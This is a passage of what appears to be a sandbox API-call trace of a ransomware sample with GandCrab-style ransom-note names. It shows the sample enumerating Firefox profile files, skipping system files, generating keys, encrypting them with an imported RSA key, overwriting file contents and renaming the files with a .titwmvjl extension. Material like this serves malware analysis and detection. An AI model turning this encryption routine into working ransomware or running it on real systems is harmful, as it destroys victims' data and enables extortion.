(lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4") returned 174 [0081.376] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4") returned 174 [0081.376] lstrcmpiW (lpString1="1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4", lpString2="desktop.ini") returned -1 [0081.376] lstrcmpiW (lpString1="1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4", lpString2="autorun.inf") returned -1 [0081.376] lstrcmpiW (lpString1="1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4", lpString2="ntuser.dat") returned -1 [0081.376] lstrcmpiW (lpString1="1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4", lpString2="iconcache.db") returned -1 [0081.376] lstrcmpiW (lpString1="1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4", lpString2="bootsect.bak") returned -1 [0081.376] lstrcmpiW (lpString1="1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4", lpString2="boot.ini") returned -1 [0081.376] lstrcmpiW (lpString1="1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4", lpString2="ntuser.dat.log") returned -1 [0081.376] lstrcmpiW (lpString1="1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4", lpString2="thumbs.db") returned -1 [0081.376] lstrcmpiW (lpString1="1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0081.377] lstrcmpiW (lpString1="1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0081.377] lstrcmpiW (lpString1="1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4", lpString2="KRAB-DECRYPT.html") returned -1 [0081.377] lstrcmpiW (lpString1="1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4", lpString2="CRAB-DECRYPT.html") returned -1 [0081.377] lstrcmpiW (lpString1="1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4", lpString2="KRAB-DECRYPT.txt") returned -1 [0081.377] lstrcmpiW (lpString1="1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4", lpString2="CRAB-DECRYPT.txt") returned -1 [0081.377] lstrcmpiW (lpString1="1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4", lpString2="ntldr") returned -1 [0081.377] lstrcmpiW (lpString1="1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4", lpString2="NTDETECT.COM") returned -1 [0081.377] lstrcmpiW (lpString1="1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4", lpString2="Bootfont.bin") returned -1 [0081.377] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4") returned 174 [0081.377] lstrlenW (lpString=".jsonlz4") returned 8 [0081.377] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0081.377] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".jsonlz4 ") returned 9 [0081.377] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.377] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0081.377] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ec [0081.378] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.378] ReadFile (in: hFile=0x2ec, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259dfd0*=0x21c, lpOverlapped=0x0) returned 1 [0081.392] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.392] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.393] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0081.395] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0081.396] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0081.396] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0081.396] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259df8c | out: pbBuffer=0x259df8c) returned 1 [0081.396] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.396] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0081.397] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.397] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.397] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0081.400] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0081.400] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0081.400] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0081.400] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259dfac | out: pbBuffer=0x259dfac) returned 1 [0081.400] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.400] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0081.400] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.401] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.401] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0081.404] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.404] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x503638) returned 1 [0081.404] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.404] CryptGetKeyParam (in: hKey=0x503638, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0081.404] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.404] CryptEncrypt (in: hKey=0x503638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259df24*=0x100) returned 1 [0081.404] GetLastError () returned 0x0 [0081.404] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.405] CryptDestroyKey (hKey=0x503638) returned 1 [0081.405] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.405] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0081.405] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.405] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0081.408] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.408] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5037f8) returned 1 [0081.408] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.408] CryptGetKeyParam (in: hKey=0x5037f8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0081.408] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.408] CryptEncrypt (in: hKey=0x5037f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259df24*=0x100) returned 1 [0081.408] GetLastError () returned 0x0 [0081.408] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.409] CryptDestroyKey (hKey=0x5037f8) returned 1 [0081.409] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.409] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0081.409] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0081.409] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0081.409] ReadFile (in: hFile=0x2ec, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259dfd0*=0x1825, lpOverlapped=0x0) returned 1 [0081.424] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xffffe7db, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.424] WriteFile (in: hFile=0x2ec, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1825, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259dfb4*=0x1825, lpOverlapped=0x0) returned 1 [0081.434] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.434] WriteFile (in: hFile=0x2ec, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259dfb4*=0x21c, lpOverlapped=0x0) returned 1 [0081.436] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.439] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.439] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.440] CloseHandle (hObject=0x2ec) returned 1 [0081.441] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495599783008.23c86977-85eb-412a-ae39-c4c6ea9a5744.main.jsonlz4.titwmvjl"), dwFlags=0x1) returned 1 [0081.442] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.442] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0081.442] lstrcmpW (lpString1="1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4", lpString2=".") returned 1 [0081.442] lstrcmpW (lpString1="1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4", lpString2="..") returned 1 [0081.442] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\", lpString2="1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4" [0081.442] lstrlenW (lpString=".titwmvjl") returned 9 [0081.442] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4") returned 174 [0081.442] VirtualAlloc (lpAddress=0x0, dwSize=0x19c, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0081.442] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4.titwmvjl") returned 183 [0081.443] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4") returned 174 [0081.443] lstrlenW (lpString=".jsonlz4") returned 8 [0081.443] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0081.443] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".jsonlz4 ") returned 9 [0081.443] lstrcmpiW (lpString1=".jsonlz4", lpString2=".titwmvjl") returned -1 [0081.443] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.443] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4") returned 174 [0081.443] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4") returned 174 [0081.443] lstrcmpiW (lpString1="1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4", lpString2="desktop.ini") returned -1 [0081.443] lstrcmpiW (lpString1="1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4", lpString2="autorun.inf") returned -1 [0081.443] lstrcmpiW (lpString1="1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4", lpString2="ntuser.dat") returned -1 [0081.443] lstrcmpiW (lpString1="1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4", lpString2="iconcache.db") returned -1 [0081.443] lstrcmpiW (lpString1="1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4", lpString2="bootsect.bak") returned -1 [0081.443] lstrcmpiW (lpString1="1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4", lpString2="boot.ini") returned -1 [0081.443] lstrcmpiW (lpString1="1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4", lpString2="ntuser.dat.log") returned -1 [0081.443] lstrcmpiW (lpString1="1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4", lpString2="thumbs.db") returned -1 [0081.443] lstrcmpiW (lpString1="1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0081.443] lstrcmpiW (lpString1="1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0081.444] lstrcmpiW (lpString1="1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4", lpString2="KRAB-DECRYPT.html") returned -1 [0081.444] lstrcmpiW (lpString1="1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4", lpString2="CRAB-DECRYPT.html") returned -1 [0081.444] lstrcmpiW (lpString1="1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4", lpString2="KRAB-DECRYPT.txt") returned -1 [0081.444] lstrcmpiW (lpString1="1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4", lpString2="CRAB-DECRYPT.txt") returned -1 [0081.444] lstrcmpiW (lpString1="1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4", lpString2="ntldr") returned -1 [0081.444] lstrcmpiW (lpString1="1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4", lpString2="NTDETECT.COM") returned -1 [0081.444] lstrcmpiW (lpString1="1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4", lpString2="Bootfont.bin") returned -1 [0081.444] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4") returned 174 [0081.444] lstrlenW (lpString=".jsonlz4") returned 8 [0081.444] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0081.444] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".jsonlz4 ") returned 9 [0081.444] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.444] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0081.444] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ec [0081.445] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.445] ReadFile (in: hFile=0x2ec, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259dfd0*=0x21c, lpOverlapped=0x0) returned 1 [0081.462] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.462] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.462] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0081.464] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0081.465] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0081.465] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0081.465] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259df8c | out: pbBuffer=0x259df8c) returned 1 [0081.465] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.465] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0081.465] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.465] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.465] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0081.468] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0081.468] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0081.468] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0081.468] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259dfac | out: pbBuffer=0x259dfac) returned 1 [0081.468] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.468] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0081.469] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.469] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.469] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0081.472] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.472] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x503978) returned 1 [0081.472] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.472] CryptGetKeyParam (in: hKey=0x503978, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0081.472] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.472] CryptEncrypt (in: hKey=0x503978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259df24*=0x100) returned 1 [0081.472] GetLastError () returned 0x0 [0081.472] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.472] CryptDestroyKey (hKey=0x503978) returned 1 [0081.472] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.473] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0081.473] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.473] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0081.476] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.476] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5037f8) returned 1 [0081.476] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.476] CryptGetKeyParam (in: hKey=0x5037f8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0081.476] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.476] CryptEncrypt (in: hKey=0x5037f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259df24*=0x100) returned 1 [0081.476] GetLastError () returned 0x0 [0081.476] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.477] CryptDestroyKey (hKey=0x5037f8) returned 1 [0081.477] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.477] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0081.477] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0081.477] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0081.477] ReadFile (in: hFile=0x2ec, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259dfd0*=0x1435, lpOverlapped=0x0) returned 1 [0081.491] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xffffebcb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.491] WriteFile (in: hFile=0x2ec, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1435, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259dfb4*=0x1435, lpOverlapped=0x0) returned 1 [0081.504] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.504] WriteFile (in: hFile=0x2ec, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259dfb4*=0x21c, lpOverlapped=0x0) returned 1 [0081.506] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.510] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.510] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.510] CloseHandle (hObject=0x2ec) returned 1 [0081.512] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4" (normalized: 